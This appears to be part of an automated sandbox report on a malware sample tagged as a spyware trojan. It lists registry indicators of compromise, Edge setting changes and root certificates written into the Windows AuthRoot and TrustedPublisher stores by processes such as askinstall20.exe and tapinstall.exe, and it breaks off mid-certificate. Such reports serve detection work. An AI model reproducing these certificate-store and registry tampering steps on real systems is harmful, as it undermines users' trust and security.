Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	setup.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	mask_svc.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-301 = "Romance Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	mask_svc.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-334 = "Jordan Daylight Time"	csrss.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time"	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	csrss.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	DrvInst.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exereg.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exevpn.tmpMicrosoftEdgeCP.exe

description	ioc	process
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{A8A88C49-5EB2-4990-A1A2-087602 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "395205405"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ReadingMode\SettingsVersion = "2"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\CIPolicyState = "0"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\New Windows\AllowInPrivate	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration\MigrationTime = 6c3a3b6c55add601	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CacheLimit = "256000"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\Interface\{BE49FBDF-9D0C-4705-9235-FD3A1AF3C76A}\ProxyStubClsid32	vpn.tmp
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x1414\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\IEMigration\FlipAheadCompletedVersion = "1"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 01000000647a46d896bf019fe67bcad8c9a2b0b26c1aadbb8aef5a1723bc57b059727e71acfb2299bd5b9b728847f0ff05038af051c4ddcd0395d43a19c6	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\PrivacyAdvanced = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\LowMic	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = c59365ac2c1cd701	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\ChromeMigration	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\DynamicCodePolicy = 00000000	MicrosoftEdgeCP.exe

Modifies system certificate store 2 TTPs 16 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

Processes:

askinstall20.exeAwesomePoolU1.exetapinstall.exevpn.tmp

description	ioc	process
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c0000000100000004000000000800000f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	askinstall20.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\6252DC40F71143A22FDE9EF7348E064251B18118	AwesomePoolU1.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43	tapinstall.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC	tapinstall.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	askinstall20.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b44696769436572742041737375726564204944